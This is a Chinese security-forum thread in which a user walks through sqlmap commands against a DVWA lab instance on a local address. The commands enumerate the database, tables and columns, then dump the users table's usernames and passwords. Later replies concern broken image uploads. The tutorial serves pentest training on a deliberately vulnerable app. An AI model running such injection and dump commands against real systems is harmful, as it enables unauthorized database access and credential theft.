设为首页收藏本站
切换到窄版

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
网络安全运维技术交流论坛»论坛 网络安全技术交流 Sqlmap注入 sqlmap 快速体验
返回列表 发新帖
查看: 1817|回复: 3

sqlmap 快速体验

[复制链接]
BoSaike

1

主题

2

回帖

9

积分

新手上路

积分
9
发表于 2024-1-9 00:03:47 | 显示全部楼层 |阅读模式


- 获取当前数据库

  ```
  sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --current-db
  ```


  得知数据库名为dvwa

  ![image-20231205181614677](image/image-20231205181614677.png)

- 获取当前数据库下的表

  ```
  sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --D dvwa --tables
  ```

  ![image-20231205181636230](image/image-20231205181636230.png)

- 获取指定表的字段信息

  ```
  python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D "dvwa" -T "users" --columns
  ```

  ![image-20231205181720063](image/image-20231205181720063.png)

- dump表中指定字段的数据

  ```
  python sqlmap.py --cookie="security=low; PHPSESSID=9209714ac614f3137b25f92880385a6e" --batch -u "http://192.168.0.110/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" -D dvwa -T users -C "user,password" --dump
  ```

  ![image-20231205181823016](image/image-20231205181823016.png)
回复

使用道具 举报

BoSaike

1

主题

2

回帖

9

积分

新手上路

积分
9
 楼主| 发表于 2024-1-9 00:05:04 | 显示全部楼层
F:\BaiduSyncdisk\笔记\pentest\工具使用\其他\image\image-20231205181610515.png
回复

使用道具 举报

BoSaike

1

主题

2

回帖

9

积分

新手上路

积分
9
 楼主| 发表于 2024-1-9 00:05:36 | 显示全部楼层
图片插入不好使
回复

使用道具 举报

admin

0

主题

2

回帖

8

积分

管理员

积分
8
发表于 2024-1-9 00:45:43 | 显示全部楼层
这个是插入图片是无法显示吗,好的等我核实一下
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|网络安全运维技术交流论坛 ( 黔ICP备2021010738号|贵公网安备2021010738号 )

GMT+8, 2024-9-8 10:09 , Processed in 0.045068 second(s), 27 queries .

Powered by Discuz! X3.5 Licensed

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表